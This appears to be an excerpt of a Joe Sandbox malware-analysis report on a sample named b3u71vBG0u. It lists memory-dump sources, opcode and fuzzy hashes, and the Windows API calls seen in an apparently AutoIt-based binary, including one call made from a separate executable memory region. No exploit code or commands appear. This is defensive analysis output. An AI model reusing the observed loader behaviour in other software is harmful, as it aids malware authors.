                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 899c8ab1a591682fa55213077536fc8e0a4eb929ea24bd5b0097ed10ef7919b0
                    • Instruction ID: 46bbde34cf83ff2cb70ba9eece2b0f5fefda1041b7164e4cc26d162b262880f2
                    • Opcode Fuzzy Hash: 899c8ab1a591682fa55213077536fc8e0a4eb929ea24bd5b0097ed10ef7919b0
                    • Instruction Fuzzy Hash: 9161AB7060024ADFCB20EF64C885AABB7F5EF44300F14817DE9069B242EB78ED61CB51
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 49b1277df17c0fc4202e6fdfdf561aa6f5cdf367d2a69413993e930c7657e7c2
                    • Instruction ID: 8fd4f4954b2698a8316b59ea915f89c608e54281401866618171182642043c45
                    • Opcode Fuzzy Hash: 49b1277df17c0fc4202e6fdfdf561aa6f5cdf367d2a69413993e930c7657e7c2
                    • Instruction Fuzzy Hash: BA51AE35700604EFCF14EB64C999EAE77A6AF85710F148168F946AB383DB38ED05CB51
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00745CF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 4bbfbd0ea48fa89dd1649faee3ca531c4e4b057f8e3a6b2ca8901c8d4d7a1dc6
                    • Instruction ID: 0b65cb014719a9ef90a995094b48699e7013a071f8c756bd0c2a3a1d170de72a
                    • Opcode Fuzzy Hash: 4bbfbd0ea48fa89dd1649faee3ca531c4e4b057f8e3a6b2ca8901c8d4d7a1dc6
                    • Instruction Fuzzy Hash: C2311971A00B1AEBCB18DF6DC484AADB7B5FF48310F148629E81993711D775AD60DBA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 286bde920c36dc2e2f89b4023d17ea2805f438ce061e25422b38667601887035
                    • Instruction ID: 252d20c75f56f16e7420abad576226f49e661d59e951ea2a3507c111d4c4f6df
                    • Opcode Fuzzy Hash: 286bde920c36dc2e2f89b4023d17ea2805f438ce061e25422b38667601887035
                    • Instruction Fuzzy Hash: B041F774604351DFDB14DF14C488B1ABBE1BF45314F1988ACE9994B762C339EC45CB92
                    APIs
                      • Part of subcall function 00744D13: FreeLibrary.KERNEL32(00000000,?), ref: 00744D4D
                      • Part of subcall function 0076548B: __wfsopen.LIBCMT ref: 00765496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744F6F
                      • Part of subcall function 00744CC8: FreeLibrary.KERNEL32(00000000), ref: 00744D02
                      • Part of subcall function 00744DD0: _memmove.LIBCMT ref: 00744E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 12c77ddcac6dad31c2fa1f27be63f26b61958f9f0022de0d89e65969f72cabaf
                    • Instruction ID: 87bb789b30f62de7d826693a7d27977c188fe456ea2a086e741307b018beaa4b
                    • Opcode Fuzzy Hash: 12c77ddcac6dad31c2fa1f27be63f26b61958f9f0022de0d89e65969f72cabaf
                    • Instruction Fuzzy Hash: 4211E732700605EBCF20AF70DC5AFAE77A59F40700F14842DF541A61C1DF799E15AB60
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 42d785b59a82b85afd896e1423d9119f3703bb1b856f42deaf9e83cf07f0a317
                    • Instruction ID: 41ea29b12a09d5ecb2083a5306110611472f0b10fe05ed2439f49a4b7bb8905b
                    • Opcode Fuzzy Hash: 42d785b59a82b85afd896e1423d9119f3703bb1b856f42deaf9e83cf07f0a317
                    • Instruction Fuzzy Hash: 1B2133B4648351DFCB14DF24C449A1ABBE0BF84304F04896CE99A57761D739E849CB92
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
                    • Instruction ID: 3f16b240ffae19e584e0b958e511a93ccd48bb7e47408a88d860a76d442fd87d
                    • Opcode Fuzzy Hash: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
                    • Instruction Fuzzy Hash: 2011C872209219ABC718AF6CD885D7EB39DEF85320714462EFD16C7290DF35AC10C791
                    APIs
                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00745807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00745D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 09ca232f559dc344d039f3122899c732afd96274be8df544a0710c7bc989b813
                    • Instruction ID: e3c876890542975c436561c4cc8b475f1c3e6a4362317ae9c6137856713e2c0b
                    • Opcode Fuzzy Hash: 09ca232f559dc344d039f3122899c732afd96274be8df544a0710c7bc989b813
                    • Instruction Fuzzy Hash: EB113631600B059FD3308F15C888B62B7E9EF45760F14C92EE4AA86A52D7B8E945CF60
                    APIs
                    • __lock_file.LIBCMT ref: 00764AD6
                      • Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: ffeb5d2d0f59210a871c3e84d02b6fb2f1e425bf17f75b0a004318506c0e17d8
                    • Instruction ID: 2eb636afb97fb50fc6526815cf2c4ef4b8c6f071ea6ff7ba91669a25237d9ced
                    • Opcode Fuzzy Hash: ffeb5d2d0f59210a871c3e84d02b6fb2f1e425bf17f75b0a004318506c0e17d8
                    • Instruction Fuzzy Hash: A9F06871940209EBDFA1AFB4CC0A7DF7661AF00325F188614FC26AA1D1DB7C8951DF55
                    APIs
                    • FreeLibrary.KERNEL32(?,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 630007936972c2b791b072fc7b696360a1a95b8d0307382a51652062c25a1c68
                    • Instruction ID: 47518251b596a560e6bd1491d3823aa2ee6c8e9d8255403d814ddd5640853fe5
                    • Opcode Fuzzy Hash: 630007936972c2b791b072fc7b696360a1a95b8d0307382a51652062c25a1c68
                    • Instruction Fuzzy Hash: 4AF06DB1105712CFCB349F64E494922BBF2BF043293288E3EE5E782610C739A858EF40
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007609F4
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: cf82a3f8adcded959a9c8fff02906b7522d56868512ce868c94257cb470717e6
                    • Instruction ID: 4992e58f4d717b6b4f1c9e76ad69c65133138e4af6e24e73102b18c10e3a322d
                    • Opcode Fuzzy Hash: cf82a3f8adcded959a9c8fff02906b7522d56868512ce868c94257cb470717e6
                    • Instruction Fuzzy Hash: 3DE08676A0422897C720D6589C09FFA77ADDF88690F0441B5FC0CD7214DA649C818690
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 66a678a42bd33ec5edae9ba894c0e2ba634849c13344e4fda9e498a460eb91bb
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: D1E09AB0204B059FDB398A28D814BE373E0AB06315F00091CF6AB83342EB66B8418B59
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0077E16B,?,?,00000000), ref: 00745DBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 79821be7e9ec403f67e1158de794e413c1f2796c68df8d7a4334467415111048
                    • Instruction ID: 1fecf077c5b877c17e41dceaca62faaa169285ad67572502f67ec9b12b529755
                    • Opcode Fuzzy Hash: 79821be7e9ec403f67e1158de794e413c1f2796c68df8d7a4334467415111048
                    • Instruction Fuzzy Hash: 41D0C77464020CBFE710DB80DC46FA9777DD705710F100195FD0456290D6B27D508795
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: cbd40fcf4633431ff485e4f878eac26aa6b5fba48aa657b7c2756b889f5d3c8e
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: BEB0927684020CB7DE012E82EC02A593F199B40678F808060FF0C18562AA77A6A0A689
                    APIs
                    • GetTempPathW.KERNELBASE(00000104,?), ref: 0078221A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: PathTemp
                    • String ID:
                    • API String ID: 2920410445-0
                    • Opcode ID: be36ddff8a700918e4e66bde0e0a5d65c9a0e614a40f38dfe6984ac81681bb37
                    • Instruction ID: b8a46245ec98452f4e47b5e2b63b81469e853a66938e6084ed153da45c8cfbbb
                    • Opcode Fuzzy Hash: be36ddff8a700918e4e66bde0e0a5d65c9a0e614a40f38dfe6984ac81681bb37
                    • Instruction Fuzzy Hash: CCC04C714550199BEB15B750CC95AA9772DBF00701F1040E5B54691050D5B85B41CF11
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 007AD46A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: ca7b199a0bd73ba341cb5e53801fc45799ca5b7c066f41d7fdb9f11283774a23
                    • Instruction ID: fb1b8b72bb632db0c519dbd2ba3ed4c527b9abb05dea97494c526d544e282fa6
                    • Opcode Fuzzy Hash: ca7b199a0bd73ba341cb5e53801fc45799ca5b7c066f41d7fdb9f11283774a23
                    • Instruction Fuzzy Hash: 4D717230208341CFC714EF24C4D5A6EB7E4AF89314F044A6DF9969B6A2DB38ED49CB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: d843de43c6ba38f1a92fb4fcda11a6f03c82e846a1df1b102033e03af97fd5cd
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: AA31D671A00115DFC718EF58D48096AF7B6FF59300B688AA5E80ACB651D73AEDC1CBC0
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 023922B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 643ba2bb021fee3f5db2272b4a5d1b89920e1682218fec026c6795d4773f82a7
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: A6E0E67494010EEFDB00EFB4D54969E7FB4EF04301F1001A1FD01D2280D6319D508A72
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007CCE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CCE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007CCED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CCF00
                    • SendMessageW.USER32 ref: 007CCF29
                    • _wcsncpy.LIBCMT ref: 007CCFA1
                    • GetKeyState.USER32(00000011), ref: 007CCFC2
                    • GetKeyState.USER32(00000009), ref: 007CCFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CCFE5
                    • GetKeyState.USER32(00000010), ref: 007CCFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CD018
                    • SendMessageW.USER32 ref: 007CD03F
                    • SendMessageW.USER32(?,00001030,?,007CB602), ref: 007CD145
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007CD15B
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007CD16E
